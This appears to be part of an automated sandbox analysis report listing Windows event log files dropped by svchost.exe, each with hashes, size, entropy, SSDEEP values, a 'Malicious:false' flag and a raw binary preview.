      MD5:4F68D6AF0C7DB9E98F8B592C9A07811C
      SHA1:9F519109344DD57150F16B540AAA417483EF44FE
      SHA-256:44177E6F71E240EBFE9CE63FEFBF5D46A01979E09C0C14F65F1D19AE8E97B8EE
      SHA-512:E1D5097BCD572F3DBAF4024FAEA76BAD3061CD2E05017701B578020327969C2BD3F725FBE8BFE4C40DC66336CE1371E7AB037058603B02449366DAE4EDE8DE69
      Malicious:false
      Preview:ElfChnk.....................................(...8...S......................................................................V..C................(.......................P...=...........................................................................................................................f...............?...........................m...................M...F...........................&................................ ..................................................N...................................**...............................&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
      Process:C:\Windows\System32\svchost.exe
      File Type:data
      Category:dropped
      Size (bytes):225200
      Entropy (8bit):4.066453136924067
      Encrypted:false
      SSDEEP:6144:Gz3Hsjz3Hl7z3Hsjz3HlCz3Hhkz3HoBz3Hliz3Hsjz3HlF:T
      MD5:E1041F89E7237CF396BC51745673960C
      SHA1:CDE39C6FB03B3CDDB5FE1DF622E6BBED19DE922F
      SHA-256:419EB9D42F9FD0EA70F1AEA168FC13A11E3A93CB59726D48C7C3E7FACA650CF4
      SHA-512:928011364578EC7213DB24B520E666361985ACD58129E99C340689EF889F266568308C6DE473EE551992AC69D98A7C1A14E7193C7E7B5C2BCBB6C2879AF53596
      Malicious:false
      Preview:ElfChnk......................................l...o.............................................................................................. .......................H...=...........................................................................................................................f...............?...........................m...................M...F................................m..............................................................................&...................................**...7..........3.[...............&............"3WI..L..........A..|...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
      Process:C:\Windows\System32\svchost.exe
      File Type:data
      Category:dropped
      Size (bytes):65536
      Entropy (8bit):4.738218345404531
      Encrypted:false
      SSDEEP:384:th+rKvKaKNP6WKkvKWKlpKuyK7YKmKaKHxqKWyK11KUIKqKq9KLjK5yKoKfKYKns:tkN2cTOsKZ3VBC6fkx0NrjzDbRt
      MD5:5D8291232297E1ED686963634E7CDE28
      SHA1:6BC4FEC737F59F7A1D33BE2FD303649AB39FF16C
      SHA-256:97A174F4E97FCDDB9F72F4AE918D3842D9B87F76B699F1B07528C5ED4585512F
      SHA-512:92A52BCA3741FB0501A671F084BC7E4FD00CD14A9541ECE3B66B04B475CECA7780B25AEC8EC89AE7ABBFC2730E8E41F007736F4C74A8034B18D6CCF23C18079E
      Malicious:false
      Preview:ElfChnk.....................................0.......'........................................................................}..................l...........................=...........................................................................................................................f...............?...........................m...................M...F.......................E................................M..&...g`..g5......................o]...........X...Z..GP...............s......od......_i..**..P............%.o..............&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
      Process:C:\Windows\System32\svchost.exe
      File Type:data
      Category:dropped
      Size (bytes):65536
      Entropy (8bit):0.7590316238843728
      Encrypted:false
      SSDEEP:384:IhP8o8Z85848V8M8g8D8R8E8T8h8p8TtP8sU8:Ic
      MD5:B074238315662886E2BD70106D08A747
      SHA1:5ADA158D19401565E76349FCA97489E9FB9BFA36
      SHA-256:53770508DCDA0199A75458B5A10DC8FD2E49A4CFD0FC001C16D56F3B567AB71C
      SHA-512:9D35DC04CCE95541551254BCBB00B0E2E0860D9B6F69D40FBC829DA31FC3AC43690A049A432BA4D43315B80675143A6AA02C57484E7903845010A5AD9EC92D6D
      Malicious:false
      Preview:ElfChnk.........................................0!....H.......................................................................j........................................V...=...........................................................................................................................f...............?...........................m...................M...F...........................................................&.......................................................................................**..(.............................&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
      Process:C:\Windows\System32\svchost.exe
      File Type:data
      Category:dropped
      Size (bytes):65536
      Entropy (8bit):3.751171514678935
      Encrypted:false
      SSDEEP:1536:JXhjUyS+z1VV18o838c8bUc8cVVsz8VX8SoX8aA8cmtpjAiVB18dwE4vjcYoMjn1:JXNnS
      MD5:7DAF3CAACD8CC5D221CC69BD69F02E28
      SHA1:F22A6ED61CED6222505CEEEA421DE513FD5B2789
      SHA-256:5C36D10490BCD0E8632B33C624338497C513839C9DB52301B7B7491E5F46A7C5
      SHA-512:AB1B02E921052548DEE58D33500BE304B814431D9B5D2A54411F6BA750EACD1BF7D3A2FE24789C088E9C99C5F5CE00835CC149E60A70D7A3D4BCD38445AADC68
      Malicious:false
      Preview:ElfChnk.........%...............%............E..`G..........................................................................2..W................v...........................=...........................................................................................................................f...............?...........................m...................M...F...........................................................&...................................................&B..........O.......................**..............g5...............&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
      Process:C:\Windows\System32\svchost.exe
      File Type:data
      Category:dropped
      Size (bytes):65536
      Entropy (8bit):2.3069197485541766
      Encrypted:false
      SSDEEP:768:S0VsLY/Z5aFka2aKazzabCafama5Sa0ra6rzaJcavkao9O0apPaQOan6qa6IvV1:ycEu
      MD5:E6E4C860CE7DD1BB499D6A082B461B90
      SHA1:11330861B23B1D29D777D9BD10619A07B6A6A9C0
      SHA-256:C27431D9C64F5C9D323E2B4ED5F44781969B34F30DC4280296A329DCD6509D44
      SHA-512:7393A0FF290BB3DB07E8BB9A9FA7B666CD8B686CBDAA3FED2EBD704D6E88A4D5768D104BD768E6AA533C42588C661A863E11ED9146ABD7386A2A9B4F84583406
      Malicious:false
      Preview:ElfChnk.........;...............;............r..@t...H......................................................................p"..................Q...........................=...........................................................a...............................................................f...............?...2...........................................M...F...........................*...........&........................................................................l..............]...................**.............._.............X..&.......X...],T.'tB..E........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
      Process:C:\Windows\System32\svchost.exe
      File Type:data
      Category:dropped
      Size (bytes):127536
      Entropy (8bit):4.001386377404223
      Encrypted:false
      SSDEEP:768:ah0w+qLpBVi7CPME79nCxkSqah0w+qLpBVi7CPME79nCxkSqfS:c0w+qtBViL0w+qtBViQS
      MD5:1399E5ABAD3730403CA5A307F9E0E76F
      SHA1:01CBA55820252AC245A609FB74D5E418FC049730
      SHA-256:80EA47978D89E65019DF1FE03CB4519FBA275C322B93CCB5B173DB0D1464E0FD
      SHA-512:69336614AB5590EF04875C12E57A68773E1619AC41A176142D151B62550D6C5FBE75A12B836869F626E93AF540CD6F45A69CA5E0551B9B7131984FFEC5C4CFFE
      Malicious:false
      Preview:ElfChnk.........#...............#........... ..............................................................................\.*f................T.......................|...=...........................................................................................................................f...............?...........................m...................M...F.......................................-...'...............&.......................................................................................**.. ............#................&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
      Process:C:\Windows\System32\svchost.exe
      File Type:data
      Category:dropped
      Size (bytes):65536
      Entropy (8bit):4.2909571978750325
      Encrypted:false
      SSDEEP:384:Ny2/hDGCyCkCzCRCFCNClCuC6CoC9rC6CdCsCvCkxCkC5CCCWCxCIC/CbCFC5CkG:Ny2/dm1sR
      MD5:B0BF4D9EC91ABBDA5D328631B125A5C0
      SHA1:E672D69127AE7C1A51046ADAA911871EC0C10ABB
      SHA-256:8DBE6F5B80B3D973BBF1177BCCAA690B9F90FC99DC358B7DE66175317C733501
      SHA-512:3132E1FCC5C8F88BD974465EA1E644CA89C2D9E041E49F8A1F48B9ACB3376F0A1042F5CB6FDFC6BE2934C4483312C35539D64DB25B892388604F9F637074BCBD
      Malicious:false
      Preview:ElfChnk.U.......~.......U.......~....................}/.....................................................................@..................F.......................n...=...........................................................................................................................f...............?...........................m...................M...F...........................................................&....................................................v..................................**..0...U.........Df..............&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
      Process:C:\Windows\System32\svchost.exe
      File Type:data
      Category:dropped
      Size (bytes):65536
      Entropy (8bit):4.488768580471203
      Encrypted:false
      SSDEEP:1536:Q9YcieRoUlafdbkKKMAQ2SomvXCQv/2ketsvQPh8YzSJoh2VgPIEF6uq9GgCVRlW:Q9YcieRoUlaFbkKKMAQ2SomvXCM/2keU
      MD5:E3FB1708C64D250E4D801AFB8688DF35
      SHA1:8B889F0358683733257411E451A86E3A1D42159D
      SHA-256:0B62FDD9A57B1809D79561AE64BE30DD7430815D6954A5E3DF90E29E1B2E6C72
      SHA-512:2F5CC514B180A39E5961452A594FE5384A6369CBCB7A1CEBAC37948770A6CB999A2E2F26A32240058D5D7A335904DAF40C88F1C096D8F85907F23E9B32E79ABE
      Malicious:false
      Preview:ElfChnk.........$...............$.....................w.........................................................................................>.......................f...=...........................................................................................................................f...............?...........................m...................M...F...........................................................&...................................................V...................................**................o...............&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
      Process:C:\Windows\System32\svchost.exe
      File Type:data
      Category:dropped
      Size (bytes):65536
      Entropy (8bit):4.499000073795324
      Encrypted:false
      SSDEEP:1536:scRFkL1TWX0gkB/J7oasEfyk2/vKlqRi/PgTZSXwyvy8fJpfrAW+Cr6SXlUr20G0:scRFkL1TWX0gkB/J7oasEfyk2/vKlqk8
      MD5:A884C6522E76DEF4D6EA5CCF0C78651C
      SHA1:7520B2BDC64C59F4FF502C54424E497ADB4CA033
      SHA-256:75A79BE6662A713096A649ACB26551E6F65B6C1249D94934ECB72740FD0F0879
      SHA-512:25F05C1DE7E2A96DCD63213EE4DA8219819CE0324DD297F52EF4081C1CB927C2F877D4E4E73354ACE97929A3083948F5DAB3EC7393A38634445BD252410D0B85
      Malicious:false
      Preview:ElfChnk.>...............>............................).....................................................................m..................0.......................X...=...........................................................................................................................f...............?...........................m...................M...F...............................................................................................A...............&...i.......~......................**......>........Q.U..............&............"3WI..L..........A..|...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
      Process:C:\Windows\System32\svchost.exe
      File Type:data
      Category:dropped
      Size (bytes):65536
      Entropy (8bit):4.494615007849227
      Encrypted:false
      SSDEEP:384:ekhN7s7o787l7r787a7J7z7+7N17g7V787g7gY7hZ7D7k7F7r7wm7NP7Y7+7fa7Z:ek93uCg
      MD5:A9648A7AB4FC0CFFF07E94D515D9AC8C
      SHA1:7042013D53F69AC353DC6B66D3B795D755FEC8F9
      SHA-256:52DCF7916572841107652C267B58D641E11214F371A815D076380E545CF2D07C
      SHA-512:5DC89970A93731FD2C858BA82A7413BC1DB6624F96693168B4163AFD64A61DDFF4B2F24CB79A2D078AC6F1F9ED982705A07C6054ADFB0047BB41DE59583E4B25
      Malicious:false
      Preview:ElfChnk.Y.......g.......Y.......g............%...&............................................................................S{............................................=...........................................................................................................................f...............?...........................m...................M...F...........................................=...............&...............................................................s.......................**......Y........................&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
      Process:C:\Windows\System32\svchost.exe
      File Type:data
      Category:dropped
      Size (bytes):65536
      Entropy (8bit):2.1499045494600955
      Encrypted:false
      SSDEEP:384:Dhc+uaNuru+uhuKVuPJu5u9u4ufuTuxuDuvuDuOuXumui+udutui4uTAuFuauind:D6Ovc0S5UyEeDgLslstY
      MD5:2045FB0D54CA8F456B545859B9F9B0A8
      SHA1:35854F87588C367DE32A3931E01BC71535E3F400
      SHA-256:E4305D5E1125E185F25AABA6FF9E32DE70B4EFD7264FE5A0C7C2EF3C33989C45
      SHA-512:013CAC4CBF67C9AB5D2A07E771BAF81950E5A256F379E3C2E26CC9E8E47379579470CC6FD56E93B31C4D17935713D1FC6026307427D77CBE9647139E3D73AC47
      Malicious:false
      Preview:ElfChnk.........;...............;...........xk...m...+.....................................................................F.~.................,.......................T...=...........................................................................................................................f...............?...........................m...................M...F...........................&...................................................................................6f..w...............................**...............&3..............&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
      Process:C:\Windows\System32\svchost.exe
      File Type:data
      Category:dropped
      Size (bytes):65536
      Entropy (8bit):0.8164696340947971
      Encrypted:false
      SSDEEP:384:jhGuZumutu4uEu5uOuDuyb2uPu1uRu3uGuHu9/u:jr
      MD5:1AB19FA472669F4334C7A9D44E94E1B3
      SHA1:F71C16706CFA9930045C9A888FDB3EF46CACC5BC
      SHA-256:549D89A256E3C71AFCBF551EC9BEDBDB3CF2DC74B4F8C214FDC1D270FB731F6E
      SHA-512:72F1F20CB1F2984B318E4A2AAEE11D573441A77D04C0577D24E19F89E85F1691CB29EF569BD25EBBBD313C7B9DB945DB43D52EEFC2EF33E7BEECDFB8E0BBC404
      Malicious:false
      Preview:ElfChnk...................................... ..x$../..........................................................................<................$.......................L...=...........................................................................................................................f...............?...........................m...................M...F...........................................................&....................................................!..................................**..............Wy.8..............&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
      Process:C:\Windows\System32\svchost.exe
      File Type:data
      Category:dropped
      Size (bytes):65536
      Entropy (8bit):0.9855903635327656
      Encrypted:false
      SSDEEP:384:cxNhPALAb/A0D6AKAlAfyVAQhAQueA4AIAwA0AYAwA+/AfAjrA3DA:cxN90yzXd
      MD5:7BCA54AC75C7185ADFBB42B1A84F86E3
      SHA1:AD91EE55A6F9F77AD871ACA9A5B59987CA679968
      SHA-256:A43B1365211A968B4EC3F9EC7489D05AD9EED30D3EE0CCD89860D20DFE1914D4
      SHA-512:79A04DCE951528E09F7580E797E38D58CFC556EFEC032C3E68C701D720E01CBDCA3D4F27C309D50B9096570787A0E62B2C69236D148AC9C216CB13AA05E9619F
      Malicious:false
      Preview:ElfChnk.....................................P+...,...0........................................................................9.................B.......................j...=...........................................................................................................................f...............?...........................m...................M...F...........................U.......................%%......&...................................................>...........................E.......**..............o.m...............&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
      Process:C:\Windows\System32\svchost.exe
      File Type:data
      Category:dropped
      Size (bytes):65536
      Entropy (8bit):3.165454452307923
      Encrypted:false
      SSDEEP:384:ghVpIcpBUpBxpBapB3pBEpBZpBKpBV1pBApBppBTSpBcu1pBspBlpBABpB7pB0py:gd+uXvB
      MD5:B6B6F199DA64422984403D7374F32528
      SHA1:980D66401DFCCF96ADDDAF22334A5CE735554E7F
      SHA-256:8F65F81EE28F48B5007E04842ACC9DE20794A59E2759C2F35F7C10730A1EF7BF
      SHA-512:5B0EFBF1C57BACF347790EB5915AFCFDDDDAFA7761D94DF1341C4E79F5B16DA3FAC2C9653C3DC41B80E31EA44AE46F4FC95C6EC0FFA0A0D3C05C69CED6955DE4
      Malicious:false
      Preview:ElfChnk.........'...............'...........P.......H:Z.....................................................................gO.................. .......................H...=...........................................................................................................................f...............?...........................m...................M...F...........................................................&....................................................f..................................**..............m.................&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
      Process:C:\Windows\System32\svchost.exe
      File Type:data
      Category:dropped
      Size (bytes):65536
      Entropy (8bit):3.8519554794255333
      Encrypted:false
      SSDEEP:384:WhtbpwV1pIvpLfpvQpw2pQYph15pcApLqBpJxTp0qo8psfp4yp4Rphe3p7PpLWBZ:WwDoh1VqKVvcVU
      MD5:4140628CA3CEC29C0B506CEEBDF684F6
      SHA1:A2B70496C8E91D8E78AA04976B25D850ABAC6E1C
      SHA-256:1823149759A2F1771ACE7B6BE14A0FEFC6F93DD9F81AC1024E6B41C2CCBFD8B0
      SHA-512:779A04771A8E9B2F501FE1251F0D56C5B5988911F6067082D84FF1DBCF5D9281E32DF6CC2C995843EA1FCED748548DC116706E0F738B6510B47C2B3A0EBAA126
      Malicious:false
      Preview:ElfChnk.\...............\.......................0..../........................................................................v................*.......................R...=...........................................................................................................................f...............?...........................m...................M...F............................................;..............&...................................i...................................mS..............**..8...\........=..............&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
      Process:C:\Windows\System32\svchost.exe
      File Type:data
      Category:dropped
      Size (bytes):65536
      Entropy (8bit):1.1642919553794224
      Encrypted:false
      SSDEEP:384:bhwCCRzCaCkClCzCYC/CyCVCGCMCvCNCACCxC/CLCoiC:bKFb
      MD5:D7EECF043241FDB9486580582E208603
      SHA1:045D5672A8E9884B78CD31C52D372375503CBF4F
      SHA-256:6F3BE76FC00FE21C18A904058F2AF850204488187187C9B8C4BF11EAA03EC6C0
      SHA-512:6738CD1D4081AD78CCC1E3E7AC46A394D9AC32906B4688E34DCCBBA42153FB826484C854F42FFF619DC8D50CAE708585B422F3EAA3A0219AAD19DC0962910125
      Malicious:false
      Preview:ElfChnk.....................................02..h6...u'.....................................................................1..................V.......................~...=...........................................................................................................................f...............?...........................m...................M...F...........................&...................................................................................V2............................../...**..p............................&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
      Process:C:\Windows\System32\svchost.exe
      File Type:data
      Category:dropped
      Size (bytes):65536
      Entropy (8bit):4.573786046413002
      Encrypted:false
      SSDEEP:768:CZZi8Ns5iLV8gRai8ZijiTEOmGkoeiDpbU:k+Jao7mce8pI
      MD5:89D19507EA663705D7EDB58E32A7D461
      SHA1:93FCCA29F726AFD237BAB88C976111C80E008F41
      SHA-256:11BE68A22947AF71FA0AD49B1AE422E7F40A4A4747748B97347F9ECBCAD2FA13
      SHA-512:01AB8E1179FD236DFC2601B816F8A4F598D30458325B52577644F543AF74E6F34498D84595A7895143094813DA74655D9333AD50ECB030461E2F306D11A17A18
      Malicious:false
      Preview:ElfChnk.....................................0#..8&..L.}................................................................................................................4...=...........................................................................................................................f...............?...........................m...................M...F...............................................................................................................&...................................**..0...........c.$...............&............"3WI..L..........A..|...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
      Process:C:\Windows\System32\svchost.exe
      File Type:data
      Category:dropped
      Size (bytes):65536
      Entropy (8bit):1.1786915949858352
      Encrypted:false
      SSDEEP:384:DhL6UsE0ZUmxUmgDUmSUmKUmgUmlUmB8UmCUmeUmNUmtUmxUmB9Um:DY7LI
      MD5:FCDF81898F226D346F04D4A9D66742C3
      SHA1:F50E0EF5EA062060A4DFE0CA2DD276521BD5092E
      SHA-256:B6DC9DD74B8CBFAC018FF447A1D31F17628789C0FB77FE2842A43F6033312ED1
      SHA-512:52FAD3642AD39B2C68FEEA6A88D26DC50325FAF92291D05AF72E457D1C23C27530B5BA98412344E5A3875C10C8F6CCC14F83E72E40989BBA8BAF859EEB2ECD59
      Malicious:false
      Preview:ElfChnk....................................../..(4.... >....................................................................*................... .......................H...=...........................................................................................................................f...............?...........................m...................M...F...........................&..................................................................................../..................................**..............a...............&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
      Process:C:\Windows\System32\svchost.exe
      File Type:data
      Category:dropped
      Size (bytes):65536
      Entropy (8bit):0.20420972245704283
      Encrypted:false
      SSDEEP:48:MaW41rP+MZQNRBEZWTENO4bpBko4yi/6FgVt:b/KNVaO80oXi/6Fg
      MD5:E294A7436BC6D4E3558F4974A68FCDB0
      SHA1:A620090175327F94546A2B947029569DBAFB3DC5
      SHA-256:2A03CE3CE5E3343D8D86FF86AC124047B2E87B96F8B91E1247AFA6A639A2AB79
      SHA-512:A471B903AA9329717C3AEC14A1C41C0FD1B9B0B1CF7E0EE7560A9DC97AFA60AE2B5C1416691121CDA71476B90FBEC8EF738C9960007221AFB07CAFF3AADD93CC
      Malicious:false
      Preview:ElfChnk................................................S......................................................................'................. .......................H...=...........................................................................................................................f...............?...........................m...................M...F...............................................................................................................&...................................**................................&............"3WI..L..........A..|...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
      Process:C:\Windows\System32\svchost.exe
      File Type:data
      Category:dropped
      Size (bytes):65536
      Entropy (8bit):1.6469884746870727
      Encrypted:false
      SSDEEP:384:/hpivNiGiriPiYiriDfiS83i0iGiTiYiUisiuiZi+iTiciUiQiJiUiBi4i/iAixQ:/G7t8H
      MD5:FC81D9FBA555C6BC7223594B8F6B46DE
      SHA1:971F47CFC0E1DCA462928DA2D8BE2B16D5A0629C
      SHA-256:9933922E09C49C5BA80292C4AED9EC9F457031E90B28B421DFFBD2F1BB840671
      SHA-512:7F2705E7526B49F76C5F2A76A88B83FC10591BAD68B451F5C67F841322076D4B408FC515EA59E0919907C73CBBD149AB5B5EE981083A52C9E90EC9FBFAD5254F
      Malicious:false
